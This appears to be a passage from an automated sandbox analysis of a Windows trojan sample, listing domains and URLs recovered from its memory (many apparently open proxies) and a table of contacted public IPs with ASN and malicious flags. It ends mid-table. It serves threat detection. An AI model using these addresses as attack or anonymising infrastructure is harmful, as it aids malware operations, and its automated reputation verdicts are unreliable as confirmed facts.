                          ip-api.com
                          		208.95.112.1
                          		truefalse
                            		high
                            repository.gij.edu.gh
                            		102.223.20.217
                            		truefalse
                              		unknown
                              windowsupdatebg.s.llnwi.net
                              		69.164.46.0
                              		truefalseunknown
                              heygirlisheeverythingyouwantedinaman.com
                              		172.67.190.93
                              		truefalseunknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://185.89.181.212:5678SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F66000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 2%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://188.164.196.31:49426SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 2%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://38.242.136.254:1970SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 3%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://183.89.45.167:8080://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		low
                              http://154.202.118.127:3128://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://5.252.23.220:3128SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 2%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://167.99.219.173:8118://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		low
                              http://176.113.73.99:3128SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 1%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://104.21.6.88:80SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://188.164.193.178:30744SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 11%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://111.224.213.165:8089://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://38.7.1.233:999SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC182000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC63E000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://192.248.166.13:8888SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 1%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://3.27.109.94:56781://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 1%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		low
                              https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://147.45.40.15:30463://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://172.67.255.224://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://178.212.48.80:8080SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 2%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://51.77.65.164:31979SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCB1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 2%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://41.65.251.85:1981://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 1%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		low
                              http://107.180.95.177:63951://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 3%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		low
                              http://46.101.19.131://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://103.28.121.58:3128://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBE93000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 2%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		low
                              http://184.178.172.25:15291SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEFD000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 7%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://50.169.135.10:80SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 3%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://36.95.155.74:3126://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 3%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		low
                              http://200.108.234.105:8080://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 1%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		low
                              http://185.161.186.82:54321://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 1%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		low
                              http://178.49.14.57:3128://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAA57000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 1%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		low
                              http://192.140.42.83:31511SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 8%, Virustotal, Browse
                              • Avira URL Cloud: malware
                              		unknown
                              http://201.77.108.64:999SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 1%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://190.14.215.130:8080://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 2%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		low
                              http://162.19.7.61:37013://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64BE000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://161.97.170.209:13636://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 7%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		low
                              http://36.92.111.49:52471://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 2%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		low
                              http://189.29.143.202:4153://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://196.216.13.36:5678SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 2%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://45.117.179.179:33164SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://154.12.253.232:25158SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://102.216.69.176:8080://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://64.202.186.2:4216SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C906D000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://72.10.160.90:15265SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://150.230.207.167:80SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://192.169.244.80:41568://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://31.22.7.188:56981://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://162.0.220.234:8776://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://168.205.102.26:8080://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C81D6000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://103.141.109.143:8181://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://54.38.179.203:35032SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8199000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C81C8000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://178.79.165.164:55014SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://91.134.140.160:27207://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://190.242.126.170:999SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://72.10.160.170:5385://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C762A000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://172.233.146.207:3128SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C81DB000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://190.120.254.233:999SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://117.54.114.101://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://202.12.80.11:83SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://203.110.145.82:63128SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://41.242.69.196:5678://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://149.202.172.113SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://149.28.141.180:65201SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://103.113.71.230:1080SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://152.32.132.220://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA682000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://162.214.163.137:7070://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CD8000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://188.166.252.135:8080://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://51.210.45.148:3865SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://46.21.153.16:3128://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://31.43.52.176:41890://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6DF0000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://103.216.51.36:32650SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBC7C000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://149.126.101.162:8080://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://179.57.172.172:999SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://198.12.253.117:32229SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://184.178.172.14:4145://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://221.153.92.39:80SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://184.22.4.109:4145://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://182.48.77.173:8674SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://37.187.143.172:47016://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://61.9.32.62:65535://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://14.241.182.44:5678SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C948B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9463000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://45.117.179.179:18701://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8446000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://103.29.90.66:32650SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://183.88.184.48:8080SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://72.37.216.68:4145SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://62.99.138.162://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://104.19.235.10SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://151.236.39.7:57248SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://103.137.218.161:83SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6EA1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6E95000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://146.190.84.209:33091://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://51.81.186.179:51405://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://141.94.174.6:13718://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://188.164.193.178:12880://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://190.97.238.93:999://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD71000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://31.43.179.160:80SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C83D6000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://72.10.160.90:7481SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://103.165.155.165:1111SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://174.64.199.82:4145://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAA57000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://72.195.114.169:4145xSecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://20.193.135.5:80SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://157.230.226.230:1202://proxySecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0A2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://160.3.168.70:8080SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              5.42.81.57
                              		unknownRussian Federation
                              		39493RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRUtrue
                              93.171.243.253
                              		unknownCzech Republic
                              		8870OVDC-ASUAfalse
                              173.209.66.178
                              		unknownUnited States
                              		14860AS-SMARTCOMUSfalse
                              212.110.188.202
                              		unknownUnited Kingdom
                              		35425BYTEMARK-ASGBtrue
                              107.148.103.231
                              		unknownUnited States
                              		54600PEGTECHINCUSfalse
                              24.230.33.96
                              		unknownUnited States
                              		11232MIDCO-NETUSfalse
                              64.157.16.43
                              		unknownUnited States
                              		3064AFFINITY-FTLUSfalse
                              50.169.37.50
                              		unknownUnited States
                              		7922COMCAST-7922USfalse
                              182.160.100.156
                              		unknownBangladesh
                              		24323AAMRA-NETWORKS-AS-APaamranetworkslimitedBDfalse
                              103.216.51.36
                              		unknownCambodia
                              		135375TCC-AS-APTodayCommunicationCoLtdKHfalse
                              31.170.22.127
                              		unknownLatvia
                              		43513NANO-ASLVfalse
                              103.131.18.194
                              		unknownIndonesia
                              		138080GMIS-AS-IDPTGlobalMediaIntiSemestaIDfalse
                              177.99.160.98
                              		unknownBrazil
                              		18881TELEFONICABRASILSABRfalse
                              139.255.41.118
                              		unknownIndonesia
                              		9905LINKNET-ID-APLinknetASNIDfalse
                              66.70.235.23
                              		unknownCanada
                              		16276OVHFRfalse
                              82.135.123.155
                              		unknownGermany
                              		8767MNET-ASGermanyDEfalse
                              181.78.11.217
                              		unknownArgentina
                              		52468UFINETPANAMASAPAfalse
                              89.168.121.175
                              		unknownUnited Kingdom
                              		9105TISCALI-UKTalkTalkCommunicationsLimitedGBfalse
                              45.227.193.166
                              		unknownBrazil
                              		28146MHNETTELECOMBRfalse
                              171.240.108.159
                              		unknownViet Nam
                              		7552VIETEL-AS-APViettelGroupVNfalse
                              181.78.11.218
                              		unknownArgentina
                              		52468UFINETPANAMASAPAfalse
                              13.234.24.116
                              		unknownUnited States
                              		16509AMAZON-02USfalse
                              41.190.233.61
                              		unknownCongo The Democratic Republic of The
                              		37638OrioncomCDfalse
                              103.4.118.130
                              		unknownBangladesh
                              		38203ADNTELECOMLTD-BDADNTelecomLtdBDfalse
                              111.68.31.130
                              		unknownIndonesia
                              		55666GMEDIA-AS-IDPTMediaSaranaDataIDfalse
                              195.30.84.76
                              		unknownGermany
                              		5539SPACENETSpaceNETAGDEfalse
                              103.74.229.133
                              		unknownBangladesh
                              		131340TAQWAIT-AS-APMdMozammelHoquetaTaqwaITBDfalse
                              195.30.84.78
                              		unknownGermany
                              		5539SPACENETSpaceNETAGDEfalse
                              116.96.92.214
                              		unknownViet Nam
                              		7552VIETEL-AS-APViettelGroupVNfalse
                              200.116.198.222
                              		unknownColombia
                              		13489EPMTelecomunicacionesSAESPCOfalse
                              154.202.109.44
                              		unknownSeychelles
                              		139086ONL-HKOCEANNETWORKLIMITEDHKfalse
                              51.83.135.35
